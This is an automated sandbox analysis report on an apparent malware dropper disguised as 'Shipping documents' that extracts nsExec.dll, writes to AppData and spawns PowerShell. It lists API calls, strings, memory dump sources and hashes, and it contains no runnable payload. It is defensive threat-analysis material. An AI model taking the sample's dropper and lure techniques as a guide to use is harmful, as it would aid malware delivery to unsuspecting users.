CreateFontIndirectW.GDI32(0040D908), ref: 00402037

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcat
String ID:
API String ID: 4253744674-0
Opcode ID: 68512fbf4ac7801365b5f78afe65c0e513a631e9eafc47c317fc045465379f25
Instruction ID: 19ee21ee25b481e0e115610c7b0d21c914cbbc44bdafb393b7f83238122b1e8a
Opcode Fuzzy Hash: 68512fbf4ac7801365b5f78afe65c0e513a631e9eafc47c317fc045465379f25
Instruction Fuzzy Hash: 4B01D4B6905340AFD300AFB4AD0AB563FA8ABA9705F10483DF641B71E2C6784709CB2D

Function 00406556 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403CC3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 0040655C
CharPrevW.USER32(?,00000000), ref: 00406567
lstrcatW.KERNEL32(?,004092B0), ref: 00406579

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406556

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: fdfa961eb15b44997f3f2a02f7ac6fdf64fbe3aae0b57c1f36678e5d22b7198e
Instruction ID: 519304617d09d62b109db9489078dc762d93bb7b848864bf6502fc90c90d6087
Opcode Fuzzy Hash: fdfa961eb15b44997f3f2a02f7ac6fdf64fbe3aae0b57c1f36678e5d22b7198e
Instruction Fuzzy Hash: 3BD05E31502521BBC7029B64AD08D9B7BBCEF46301301446AFA41B3165C7745D41C7ED

Function 00402077 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00405D3A: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,00000000,?,?), ref: 00405D6C
Part of subcall function 00405D3A: lstrlenW.KERNEL32(?,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,00000000,?,?), ref: 00405D7E
Part of subcall function 00405D3A: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,?,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,00000000,?,?), ref: 00405D99
Part of subcall function 00405D3A: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll), ref: 00405DB1
Part of subcall function 00405D3A: SendMessageW.USER32(?), ref: 00405DD8
Part of subcall function 00405D3A: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DF3
Part of subcall function 00405D3A: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E00

Part of subcall function 004069F3: ShellExecuteExW.SHELL32(?), ref: 00406A02

Part of subcall function 00406514: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040651E
Part of subcall function 00406514: GetExitCodeProcess.KERNEL32(?,?), ref: 00406548

CloseHandle.KERNEL32(?,?), ref: 00402110

Strings

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer, xrefs: 004020D1
@, xrefs: 004020F2
C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll, xrefs: 00402098

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: MessageSend$lstrlen$CloseCodeExecuteExitHandleObjectProcessShellSingleTextWaitWindowlstrcat
String ID: @$C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer
API String ID: 4079680657-4292468661
Opcode ID: 695c155ae2aa0d65a87f0415198d5af33f758c25e38eb3c1e900b1cee02d820b
Instruction ID: 7c7d4bc9f8110f395c3ef373be7a4f0c936d35dff6000358c7303bcbf620d08d
Opcode Fuzzy Hash: 695c155ae2aa0d65a87f0415198d5af33f758c25e38eb3c1e900b1cee02d820b
Instruction Fuzzy Hash: 47118F716083809BC310AF61C98561BBBE5BF84349F00493EF595E72D1DBBC8845CB4A

Function 00403389 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00403579), ref: 0040339A
GetTickCount.KERNEL32 ref: 004033B9
CreateDialogParamW.USER32(0000006F,00000000,0040364F,00000000), ref: 004033D8
ShowWindow.USER32(00000000,00000005), ref: 004033E6

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 7ff58af3a69088ba52de52b21ac6e50ccae1de6d9f2c722b533f380b119e7b3d
Instruction ID: 0c7035cfe5d59141003efccf1163e7ed1ec08c4572f7111a89f6d0b07e944292
Opcode Fuzzy Hash: 7ff58af3a69088ba52de52b21ac6e50ccae1de6d9f2c722b533f380b119e7b3d
Instruction Fuzzy Hash: 87F098B0981300BBEB24AF60EE4DB5A3AB8B744B03F800979F505B51E1DB795955DA1C

Function 004058D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405904
CallWindowProcW.USER32(?,?,?,?), ref: 0040594C

Part of subcall function 004054E8: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA

Strings

, xrefs: 004058E5

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: ce6b446289bf2d1d80a1f39e5d6dd25478004387473800b399ee72f8fd73986e
Instruction ID: 06e031647f3a40a893da8a12316d751141f27423df1ca697d7c88d312f012a23
Opcode Fuzzy Hash: ce6b446289bf2d1d80a1f39e5d6dd25478004387473800b399ee72f8fd73986e
Instruction Fuzzy Hash: 64018F72A00609FBEF305F51ED44A9B3A2AEB54760F104437F904B61E1C2798892DFA9

Function 00405864 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405874

Part of subcall function 004054E8: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA

OleUninitialize.OLE32(00000404,00000000), ref: 004058C0

Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409

Strings

perchlorination: Installing, xrefs: 00405864

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: MessageSend$InitializeUninitialize
String ID: perchlorination: Installing
API String ID: 1011633862-2388396748
Opcode ID: d3b477feca803d38b0fa0a9443a8adab0e946c85309316e9af7505676d23e992
Instruction ID: 6162ea9da32c9538b6d8593dc8e66a114e5892011aec6599076d88f80df4c0eb
Opcode Fuzzy Hash: d3b477feca803d38b0fa0a9443a8adab0e946c85309316e9af7505676d23e992
Instruction Fuzzy Hash: C5F0FA33500A009AF711B715AC02B6B73A8EB84705F08813EEE48A22A2E77948409B69

Function 0040620F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 0040621B
PeekMessageW.USER32(?,00000000,?,y5@,00000001), ref: 0040622F

Strings

y5@, xrefs: 00406223

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: Message$DispatchPeek
String ID: y5@
API String ID: 1770753511-1888225771
Opcode ID: 64ff892afa75a6f008d7101155dee183943c3d1907309ee94509adaab9142ef1
Instruction ID: a24ec92ef1b44bd1206bcd030c3399a913cbf723d0e0f52077422d22942c0190
Opcode Fuzzy Hash: 64ff892afa75a6f008d7101155dee183943c3d1907309ee94509adaab9142ef1
Instruction Fuzzy Hash: 41D0127194020ABBEF10AFE0DD09F9A7B6CAB54744F008475B701B5091D678D5258B59

Function 00406D10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403458,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,80000000,00000003,?,?,?,?,?), ref: 00406D16
CharPrevW.USER32(80000000,00000000,?,?,?,?,?), ref: 00406D27

Strings

C:\Users\user\Desktop, xrefs: 00406D10

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: ad5ea2724f566449118616985c1ca7d7286fc26986b3b6df7891a374239d9a00
Instruction ID: 44824fea6f3b9252f25675ab164e3effdf97f7511deaacd8752cc1a9fc297a0b
Opcode Fuzzy Hash: ad5ea2724f566449118616985c1ca7d7286fc26986b3b6df7891a374239d9a00
Instruction Fuzzy Hash: CBD05E31102531ABCB126B18DC059AF77B8EF41300306886AE542E7164C7785D92CBAD

Analysis Process: powershell.exePID: 6396, Parent PID: 764COMMON

Executed Functions

Function 0675EBD8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6750000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a993467367df8efc973d4b3f53f8abcb43d326c52bf5ab646ca51ecb3ac7a87
Instruction ID: 9b00f834a18dc88a065cb5770f5800edc0318fea18627f473e33cc0bd4e53917
Opcode Fuzzy Hash: 2a993467367df8efc973d4b3f53f8abcb43d326c52bf5ab646ca51ecb3ac7a87
Instruction Fuzzy Hash: 36B17F71E00219DFDF94CFA8C9857ADBBF2AF88304F158169D815E7294EBB49942CF81

Function 0675F4A8 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6750000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b67bae8ecfd03c6f26b89739826418c63b2f8569cbb457391d68cdab7b4ecd9
Instruction ID: 264be56b635df54ac485fcf98eb220aa067177323248d489a57baa259512b330
Opcode Fuzzy Hash: 3b67bae8ecfd03c6f26b89739826418c63b2f8569cbb457391d68cdab7b4ecd9
Instruction Fuzzy Hash: 97B16E70E00209CFDF50CFA8C9857ADBBF2EF88314F158569D815A7254EBB89885CF81

Function 07293170 Relevance: 38.5, Strings: 30, Instructions: 973COMMON

Download Yara Rule

Strings

4']q, xrefs: 072932C9
4']q, xrefs: 07294711
x.{k, xrefs: 07293ED2
4']q, xrefs: 07294A50
4']q, xrefs: 07295016
tP]q, xrefs: 07293460
-{k, xrefs: 07293F04
4']q, xrefs: 07294900
4']q, xrefs: 07293C5E
4']q, xrefs: 072949B4
tP]q, xrefs: 07293454
4']q, xrefs: 0729490C
4']q, xrefs: 0729471D
4']q, xrefs: 072947B9
4']q, xrefs: 07294D96
4']q, xrefs: 0729500A
4']q, xrefs: 07294672
4']q, xrefs: 072949A8
4']q, xrefs: 07294BA3
4']q, xrefs: 072945BE
4']q, xrefs: 072947C5
4']q, xrefs: 07294666
4']q, xrefs: 07293C52
4']q, xrefs: 07294AF8
4']q, xrefs: 07294B04
4']q, xrefs: 07294A5C
4']q, xrefs: 07294DA2
4']q, xrefs: 072932D5
4']q, xrefs: 07294BAF
4']q, xrefs: 072945CA

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$x.{k$-{k
API String ID: 0-1827549809
Opcode ID: 039d899ee58c3ee7d5e07f9db4d87c2354b36b2bf5e8f2b0e794dbb75bbfaf26
Instruction ID: 22b40d205869ee66e4bebc2c320bbb053533a6bbbeddc4147e45c702dd4a144f
Opcode Fuzzy Hash: 039d899ee58c3ee7d5e07f9db4d87c2354b36b2bf5e8f2b0e794dbb75bbfaf26
Instruction Fuzzy Hash: 6382C270B102058FDB24DB58C950BAABBB2EF85314F54C4A9D9099F352CB72DD46CFA1

Function 0729C831 Relevance: 9.7, Strings: 7, Instructions: 985COMMON

Download Yara Rule

Strings

x.{k, xrefs: 0729D8C5
-{k, xrefs: 0729CFBA
4']q, xrefs: 0729D4DC
4']q, xrefs: 0729CD4D
4']q, xrefs: 0729CD59
x.{k, xrefs: 0729CF88
4']q, xrefs: 0729D4F2

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$x.{k$x.{k$-{k
API String ID: 0-774738033
Opcode ID: 9ad3a78dffb27d4904751e80f60f8505f128db15662d68c1449cfb604a975cd1
Instruction ID: fe54a5e7c4126c7335d54ef095654d5d9998a37dd68cc334fcdc923e08a9fc75
Opcode Fuzzy Hash: 9ad3a78dffb27d4904751e80f60f8505f128db15662d68c1449cfb604a975cd1
Instruction Fuzzy Hash: 3E927170B102158FDB64DB58CA50BAABBB2FF85304F5484E8D9096B351CB72ED86CF91

Function 07291278 Relevance: 8.1, Strings: 6, Instructions: 599COMMON

Download Yara Rule

Strings

4']q, xrefs: 072915F2
4']q, xrefs: 07291868
tP]q, xrefs: 07291303
4']q, xrefs: 07291874
tP]q, xrefs: 0729130F
4']q, xrefs: 072915E6

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q
API String ID: 0-2931719552
Opcode ID: f161e557791d77aeb9e7ec31e890e2b6934267c0f02e41eb9bdd88ebb0358f18
Instruction ID: 02ce8f8d469ce7881556cd0b9cb1d4272f1e6e3a681a632fda704907547232bf
Opcode Fuzzy Hash: f161e557791d77aeb9e7ec31e890e2b6934267c0f02e41eb9bdd88ebb0358f18
Instruction Fuzzy Hash: A832E070B1124A9FDB24CB99C641BAABBF2EF85310F188479E9059F351CB72ED41CB91

Function 072954A8 Relevance: 7.9, Strings: 6, Instructions: 373COMMON

Download Yara Rule

Strings

4']q, xrefs: 072957BD
x.{k, xrefs: 0729587C
4']q, xrefs: 0729583C
4']q, xrefs: 07295830
4']q, xrefs: 072957B1
-{k, xrefs: 072958C1

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$x.{k$-{k
API String ID: 0-3535003682
Opcode ID: 31c7197b8b6e131a99282c801d7858d5f568702457f8a47d8518bdf2a395acbf
Instruction ID: 6bb3693d85c3153dd140ba6198807081b275fb2748d27b89721768bd46accdd2
Opcode Fuzzy Hash: 31c7197b8b6e131a99282c801d7858d5f568702457f8a47d8518bdf2a395acbf
Instruction Fuzzy Hash: 3AE1C370B102059FCB15DBA9C650BAEBBA2EFC4314F15C828E8016F395CB72EC46CB91

Function 072981D8 Relevance: 5.6, Strings: 4, Instructions: 609COMMON

Download Yara Rule

Strings

4']q, xrefs: 07298520
4']q, xrefs: 07298516
4']q, xrefs: 072986A6
4']q, xrefs: 072986B0

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: 659ae33cd965c86002aa74b36aac706d4c53368c71dd74a0da2d65fcec9c9407
Instruction ID: 25370d4c44118529ec118763f1b2afd64d2ee9adff1f2def53e0071f744488ac
Opcode Fuzzy Hash: 659ae33cd965c86002aa74b36aac706d4c53368c71dd74a0da2d65fcec9c9407
Instruction Fuzzy Hash: E8123CB1B24246DFCF255B7895107AABBA2AFC7310F1C887AD905CF251DB32D846C7A1

Function 07295488 Relevance: 5.3, Strings: 4, Instructions: 298COMMON

Download Yara Rule

Strings

x.{k, xrefs: 0729587C
4']q, xrefs: 07295830
4']q, xrefs: 072957B1
-{k, xrefs: 072958C1

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$x.{k$-{k
API String ID: 0-3515066249
